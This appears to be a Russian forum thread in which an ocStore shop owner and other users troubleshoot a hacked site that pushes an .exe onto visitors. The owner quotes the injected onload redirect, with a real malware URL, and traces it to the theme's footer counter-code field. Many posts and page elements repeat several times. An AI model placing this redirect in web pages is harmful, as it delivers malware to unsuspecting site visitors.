borborich Опубликовано: 9 октября 2022 Поделиться Опубликовано: 9 октября 2022 ocstore 2.3.0.2.3 newstore При посещении главной страницы сайта, загружается на компьютер exe файл c другого магазина сделаного также на opencart. обращение в поддержку хостинга особо не помогло. Где копать? Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться...
esculapra Опубликовано: 9 октября 2022 Поделиться Опубликовано: 9 октября 2022 (изменено) 09.10.2022 в 09:27, borborich сказал: Где копать? Заходите в панель управления хостинга и ищите измененные файлы, время создания/модификации которых отличается от остальных. Известно ли, как называется вредоносный exe? Изменено 9 октября 2022 пользователем esculapra Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... buslikdrev Опубликовано: 9 октября 2022 Поделиться Опубликовано: 9 октября 2022 09.10.2022 в 08:27, borborich сказал: ocstore 2.3.0.2.3 newstore При посещении главной страницы сайта, загружается на компьютер exe файл c другого магазина сделаного также на opencart. обращение в поддержку хостинга особо не помогло. Где копать? https://opencart-forum.ru/files/file/8788-chistka-saytov-i-serverov-ot-virusov/ 1 Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 09.10.2022 в 08:47, esculapra сказал: Заходите в панель управления хостинга и ищите измененные файлы, время создания/модификации которых отличается от остальных. Известно ли, как называется вредоносный exe? Делал откат на месяц назад, тогда этой проблемы не было, но не помогло. Файл называется прайслист.exe качается с другого сервера. Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... esculapra Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 09:37, borborich сказал: Делал откат на месяц назад Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью. Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска. Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 09:21, esculapra сказал: Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью. Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска. Спасибо, сейчас буду делать Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 09:21, esculapra сказал: Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью. Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска. ai-bolt что то пропустил все файлы Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... SSHEVA Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 (изменено) 10.10.2022 в 13:00, borborich сказал: ai-bolt что то пропустил все файлы Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом Изменено 10 октября 2022 пользователем SSHEVA 1 Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 12:12, SSHEVA сказал: Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом каким антивирусом пользовались? Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... SSHEVA Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 14:16, borborich сказал: каким антивирусом пользовались? ESET SMART SECURITY PREMIUM Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... esculapra Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 (изменено) 10.10.2022 в 13:12, SSHEVA сказал: Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК Я еще не успел этого написать. Да, если на сайте плотно поковырялись, то антивирус реально найдет. Айболит должен был найти, но видимо там нет явного кода. Можно попробовать параноидальный режим. Хотя, если это в картинках то может не найти - проще посмотреть исходный код страницы и какие картинки подключаются, а потом сравнить их по времени создания. Картинки также могут подключаться через стили, но тут откат бы все исправил. Изменено 10 октября 2022 пользователем esculapra Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 ссыль на файл прям в боди вставляется, скачиваю файлы сайта на компьютер чтоб сканировать. Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... SSHEVA Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 16:44, borborich сказал: ссыль на файл прям в боди вставляется, скачиваю файлы сайта на компьютер чтоб сканировать. После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще Поиск использовать в редакторе. Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 15:54, SSHEVA сказал: После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще Поиск использовать в редакторе. спасибо, собственно для этого и скачиваю Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 11 октября 2022 Автор Поделиться Опубликовано: 11 октября 2022 Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';"> дают ноль результатов Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... SSHEVA Опубликовано: 11 октября 2022 Поделиться Опубликовано: 11 октября 2022 11.10.2022 в 12:18, borborich сказал: Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';"> дают ноль результатов Тогда нужно смотреть уже сайт, так вслепую сложно сказать Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 11 октября 2022 Автор Поделиться Опубликовано: 11 октября 2022 Нашелся в конфигах подвала newstore, теперь бы понять как он туда попал и как этого избежать@29aleksey есть предположения? Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... 29aleksey Опубликовано: 11 октября 2022 Поделиться Опубликовано: 11 октября 2022 В настройки шаблона в поле код счетчика прописывается только с админки Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 12 октября 2022 Автор Поделиться Опубликовано: 12 октября 2022 11.10.2022 в 20:38, 29aleksey сказал: В настройки шаблона в поле код счетчика прописывается только с админки подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... Ecolotos Опубликовано: 18 октября 2022 Поделиться Опубликовано: 18 октября 2022 В 12.10.2022 в 15:48, borborich сказав: подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда Звучит это все как фантастика Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... Создайте аккаунт или войдите в него для комментирования Вы должны быть пользователем, чтобы оставить комментарий Создать аккаунт Зарегистрируйтесь для получения аккаунта. Это просто! Зарегистрировать аккаунт Войти Уже зарегистрированы? Войдите здесь. Войти сейчас Поделиться Больше способов поделиться... Подписчики 5 Перейти к списку тем Похожие публикации Вирус Автор: Magazinufedora, 20 декабря 2022 2 ответа 127 просмотров esculapra 20 декабря 2022 Кто может почистить сайт от вирусов и удалить ненужные файлы и папки? Автор: PRONTO, 27 ноября 2022 1 ответ 155 просмотров buslikdrev 27 ноября 2022 Вирус image.php в корне и /admin/ Автор: aksen87, 5 ноября 2022 3 ответа 393 просмотра markimax 21 ноября 2022 Как сделать закрытую инфу для покупателей, но открытую для продавцов магазина? Автор: alinalessioYandex, 21 декабря 2022 1 ответ 148 просмотров spectre 21 декабря 2022 Настройка сервера и удаление вирусов Автор: tehnomad, 18 октября 2022 2 ответа 694 просмотра WarStyle 19 октября 2022 Сейчас на странице 0 пользователей Нет пользователей, просматривающих эту страницу. Последние темы Последние дополнения Последние новости Вся активность Главная Opencart 2.x Opencart 2.x: Общие вопросы Вирус закачивается на компьютер при открытии сайта Покупателям Оплата дополнений физическими лицами Оплата дополнений юридическими лицами Политика возвратов Разработчикам Регламент размещения дополнений Регламент продаж и поддержки дополнений Виртуальный аккаунт автора Политика продвижения объявлений API каталога дополнений Урегулирование споров по авторским правам Полезная информация Публичная оферта Политика возвратов Политика конфиденциальности Платежная политика Политика Передачи Персональных Данных Политика прозрачности Последние дополнения TgMarket - Модуль интернет магазина в телеграмме. Автор: Rassol2 ShowCase – адаптивный универсальный шаблон Автор: octemplates Telnotification Автор: Yevhenii_7777 Слайдер Производителей Автор: klimmm Информация (подсказка) Опций и Атрибутов Автор: Parallax × Уже зарегистрированы? Войти Регистрация Раздел покупок Назад Приобретенные дополнения Ваши счета Список желаний Альтернативные контакты Форум Новости ocStore Назад Официальный сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Скачать ocStore Документация История версий ocStore Блоги Модули Шаблоны Назад Бесплатные шаблоны Платные шаблоны Услуги FAQ OpenCart.Pro Назад Демо Купить Сравнение Хостинг для OpenCart × Создать... Важная информация На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности. Я принимаю
buslikdrev Опубликовано: 9 октября 2022 Поделиться Опубликовано: 9 октября 2022 09.10.2022 в 08:27, borborich сказал: ocstore 2.3.0.2.3 newstore При посещении главной страницы сайта, загружается на компьютер exe файл c другого магазина сделаного также на opencart. обращение в поддержку хостинга особо не помогло. Где копать? https://opencart-forum.ru/files/file/8788-chistka-saytov-i-serverov-ot-virusov/ 1 Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 09.10.2022 в 08:47, esculapra сказал: Заходите в панель управления хостинга и ищите измененные файлы, время создания/модификации которых отличается от остальных. Известно ли, как называется вредоносный exe? Делал откат на месяц назад, тогда этой проблемы не было, но не помогло. Файл называется прайслист.exe качается с другого сервера. Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... esculapra Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 09:37, borborich сказал: Делал откат на месяц назад Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью. Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска. Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 09:21, esculapra сказал: Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью. Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска. Спасибо, сейчас буду делать Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 09:21, esculapra сказал: Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью. Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска. ai-bolt что то пропустил все файлы Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... SSHEVA Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 (изменено) 10.10.2022 в 13:00, borborich сказал: ai-bolt что то пропустил все файлы Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом Изменено 10 октября 2022 пользователем SSHEVA 1 Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 12:12, SSHEVA сказал: Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом каким антивирусом пользовались? Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... SSHEVA Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 14:16, borborich сказал: каким антивирусом пользовались? ESET SMART SECURITY PREMIUM Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... esculapra Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 (изменено) 10.10.2022 в 13:12, SSHEVA сказал: Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК Я еще не успел этого написать. Да, если на сайте плотно поковырялись, то антивирус реально найдет. Айболит должен был найти, но видимо там нет явного кода. Можно попробовать параноидальный режим. Хотя, если это в картинках то может не найти - проще посмотреть исходный код страницы и какие картинки подключаются, а потом сравнить их по времени создания. Картинки также могут подключаться через стили, но тут откат бы все исправил. Изменено 10 октября 2022 пользователем esculapra Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 ссыль на файл прям в боди вставляется, скачиваю файлы сайта на компьютер чтоб сканировать. Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... SSHEVA Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 16:44, borborich сказал: ссыль на файл прям в боди вставляется, скачиваю файлы сайта на компьютер чтоб сканировать. После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще Поиск использовать в редакторе. Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 15:54, SSHEVA сказал: После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще Поиск использовать в редакторе. спасибо, собственно для этого и скачиваю Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 11 октября 2022 Автор Поделиться Опубликовано: 11 октября 2022 Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';"> дают ноль результатов Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... SSHEVA Опубликовано: 11 октября 2022 Поделиться Опубликовано: 11 октября 2022 11.10.2022 в 12:18, borborich сказал: Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';"> дают ноль результатов Тогда нужно смотреть уже сайт, так вслепую сложно сказать Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 11 октября 2022 Автор Поделиться Опубликовано: 11 октября 2022 Нашелся в конфигах подвала newstore, теперь бы понять как он туда попал и как этого избежать@29aleksey есть предположения? Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... 29aleksey Опубликовано: 11 октября 2022 Поделиться Опубликовано: 11 октября 2022 В настройки шаблона в поле код счетчика прописывается только с админки Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 12 октября 2022 Автор Поделиться Опубликовано: 12 октября 2022 11.10.2022 в 20:38, 29aleksey сказал: В настройки шаблона в поле код счетчика прописывается только с админки подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... Ecolotos Опубликовано: 18 октября 2022 Поделиться Опубликовано: 18 октября 2022 В 12.10.2022 в 15:48, borborich сказав: подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда Звучит это все как фантастика Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... Создайте аккаунт или войдите в него для комментирования Вы должны быть пользователем, чтобы оставить комментарий Создать аккаунт Зарегистрируйтесь для получения аккаунта. Это просто! Зарегистрировать аккаунт Войти Уже зарегистрированы? Войдите здесь. Войти сейчас Поделиться Больше способов поделиться... Подписчики 5 Перейти к списку тем Похожие публикации Вирус Автор: Magazinufedora, 20 декабря 2022 2 ответа 127 просмотров esculapra 20 декабря 2022 Кто может почистить сайт от вирусов и удалить ненужные файлы и папки? Автор: PRONTO, 27 ноября 2022 1 ответ 155 просмотров buslikdrev 27 ноября 2022 Вирус image.php в корне и /admin/ Автор: aksen87, 5 ноября 2022 3 ответа 393 просмотра markimax 21 ноября 2022 Как сделать закрытую инфу для покупателей, но открытую для продавцов магазина? Автор: alinalessioYandex, 21 декабря 2022 1 ответ 148 просмотров spectre 21 декабря 2022 Настройка сервера и удаление вирусов Автор: tehnomad, 18 октября 2022 2 ответа 694 просмотра WarStyle 19 октября 2022 Сейчас на странице 0 пользователей Нет пользователей, просматривающих эту страницу. Последние темы Последние дополнения Последние новости Вся активность Главная Opencart 2.x Opencart 2.x: Общие вопросы Вирус закачивается на компьютер при открытии сайта Покупателям Оплата дополнений физическими лицами Оплата дополнений юридическими лицами Политика возвратов Разработчикам Регламент размещения дополнений Регламент продаж и поддержки дополнений Виртуальный аккаунт автора Политика продвижения объявлений API каталога дополнений Урегулирование споров по авторским правам Полезная информация Публичная оферта Политика возвратов Политика конфиденциальности Платежная политика Политика Передачи Персональных Данных Политика прозрачности Последние дополнения TgMarket - Модуль интернет магазина в телеграмме. Автор: Rassol2 ShowCase – адаптивный универсальный шаблон Автор: octemplates Telnotification Автор: Yevhenii_7777 Слайдер Производителей Автор: klimmm Информация (подсказка) Опций и Атрибутов Автор: Parallax × Уже зарегистрированы? Войти Регистрация Раздел покупок Назад Приобретенные дополнения Ваши счета Список желаний Альтернативные контакты Форум Новости ocStore Назад Официальный сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Скачать ocStore Документация История версий ocStore Блоги Модули Шаблоны Назад Бесплатные шаблоны Платные шаблоны Услуги FAQ OpenCart.Pro Назад Демо Купить Сравнение Хостинг для OpenCart × Создать... Важная информация На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности. Я принимаю
borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 09.10.2022 в 08:47, esculapra сказал: Заходите в панель управления хостинга и ищите измененные файлы, время создания/модификации которых отличается от остальных. Известно ли, как называется вредоносный exe? Делал откат на месяц назад, тогда этой проблемы не было, но не помогло. Файл называется прайслист.exe качается с другого сервера. Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться...
esculapra Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 09:37, borborich сказал: Делал откат на месяц назад Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью. Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска. Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 09:21, esculapra сказал: Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью. Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска. Спасибо, сейчас буду делать Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 09:21, esculapra сказал: Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью. Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска. ai-bolt что то пропустил все файлы Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... SSHEVA Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 (изменено) 10.10.2022 в 13:00, borborich сказал: ai-bolt что то пропустил все файлы Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом Изменено 10 октября 2022 пользователем SSHEVA 1 Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 12:12, SSHEVA сказал: Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом каким антивирусом пользовались? Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... SSHEVA Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 14:16, borborich сказал: каким антивирусом пользовались? ESET SMART SECURITY PREMIUM Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... esculapra Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 (изменено) 10.10.2022 в 13:12, SSHEVA сказал: Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК Я еще не успел этого написать. Да, если на сайте плотно поковырялись, то антивирус реально найдет. Айболит должен был найти, но видимо там нет явного кода. Можно попробовать параноидальный режим. Хотя, если это в картинках то может не найти - проще посмотреть исходный код страницы и какие картинки подключаются, а потом сравнить их по времени создания. Картинки также могут подключаться через стили, но тут откат бы все исправил. Изменено 10 октября 2022 пользователем esculapra Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 ссыль на файл прям в боди вставляется, скачиваю файлы сайта на компьютер чтоб сканировать. Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... SSHEVA Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 16:44, borborich сказал: ссыль на файл прям в боди вставляется, скачиваю файлы сайта на компьютер чтоб сканировать. После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще Поиск использовать в редакторе. Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 15:54, SSHEVA сказал: После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще Поиск использовать в редакторе. спасибо, собственно для этого и скачиваю Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 11 октября 2022 Автор Поделиться Опубликовано: 11 октября 2022 Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';"> дают ноль результатов Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... SSHEVA Опубликовано: 11 октября 2022 Поделиться Опубликовано: 11 октября 2022 11.10.2022 в 12:18, borborich сказал: Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';"> дают ноль результатов Тогда нужно смотреть уже сайт, так вслепую сложно сказать Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 11 октября 2022 Автор Поделиться Опубликовано: 11 октября 2022 Нашелся в конфигах подвала newstore, теперь бы понять как он туда попал и как этого избежать@29aleksey есть предположения? Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... 29aleksey Опубликовано: 11 октября 2022 Поделиться Опубликовано: 11 октября 2022 В настройки шаблона в поле код счетчика прописывается только с админки Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... borborich Опубликовано: 12 октября 2022 Автор Поделиться Опубликовано: 12 октября 2022 11.10.2022 в 20:38, 29aleksey сказал: В настройки шаблона в поле код счетчика прописывается только с админки подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... Ecolotos Опубликовано: 18 октября 2022 Поделиться Опубликовано: 18 октября 2022 В 12.10.2022 в 15:48, borborich сказав: подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда Звучит это все как фантастика Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться... Создайте аккаунт или войдите в него для комментирования Вы должны быть пользователем, чтобы оставить комментарий Создать аккаунт Зарегистрируйтесь для получения аккаунта. Это просто! Зарегистрировать аккаунт Войти Уже зарегистрированы? Войдите здесь. Войти сейчас Поделиться Больше способов поделиться... Подписчики 5 Перейти к списку тем Похожие публикации Вирус Автор: Magazinufedora, 20 декабря 2022 2 ответа 127 просмотров esculapra 20 декабря 2022 Кто может почистить сайт от вирусов и удалить ненужные файлы и папки? Автор: PRONTO, 27 ноября 2022 1 ответ 155 просмотров buslikdrev 27 ноября 2022 Вирус image.php в корне и /admin/ Автор: aksen87, 5 ноября 2022 3 ответа 393 просмотра markimax 21 ноября 2022 Как сделать закрытую инфу для покупателей, но открытую для продавцов магазина? Автор: alinalessioYandex, 21 декабря 2022 1 ответ 148 просмотров spectre 21 декабря 2022 Настройка сервера и удаление вирусов Автор: tehnomad, 18 октября 2022 2 ответа 694 просмотра WarStyle 19 октября 2022 Сейчас на странице 0 пользователей Нет пользователей, просматривающих эту страницу. Последние темы Последние дополнения Последние новости Вся активность Главная Opencart 2.x Opencart 2.x: Общие вопросы Вирус закачивается на компьютер при открытии сайта Покупателям Оплата дополнений физическими лицами Оплата дополнений юридическими лицами Политика возвратов Разработчикам Регламент размещения дополнений Регламент продаж и поддержки дополнений Виртуальный аккаунт автора Политика продвижения объявлений API каталога дополнений Урегулирование споров по авторским правам Полезная информация Публичная оферта Политика возвратов Политика конфиденциальности Платежная политика Политика Передачи Персональных Данных Политика прозрачности Последние дополнения TgMarket - Модуль интернет магазина в телеграмме. Автор: Rassol2 ShowCase – адаптивный универсальный шаблон Автор: octemplates Telnotification Автор: Yevhenii_7777 Слайдер Производителей Автор: klimmm Информация (подсказка) Опций и Атрибутов Автор: Parallax
borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 09:21, esculapra сказал: Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью. Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска. Спасибо, сейчас буду делать Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться...
borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 09:21, esculapra сказал: Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью. Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска. ai-bolt что то пропустил все файлы Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться...
SSHEVA Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 (изменено) 10.10.2022 в 13:00, borborich сказал: ai-bolt что то пропустил все файлы Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом Изменено 10 октября 2022 пользователем SSHEVA 1 Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться...
borborich Опубликовано: 10 октября 2022 Автор Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 12:12, SSHEVA сказал: Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом каким антивирусом пользовались? Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться...
SSHEVA Опубликовано: 10 октября 2022 Поделиться Опубликовано: 10 октября 2022 10.10.2022 в 14:16, borborich сказал: каким антивирусом пользовались? ESET SMART SECURITY PREMIUM Ссылка на комментарий Поделиться на других сайтах Больше способов поделиться...
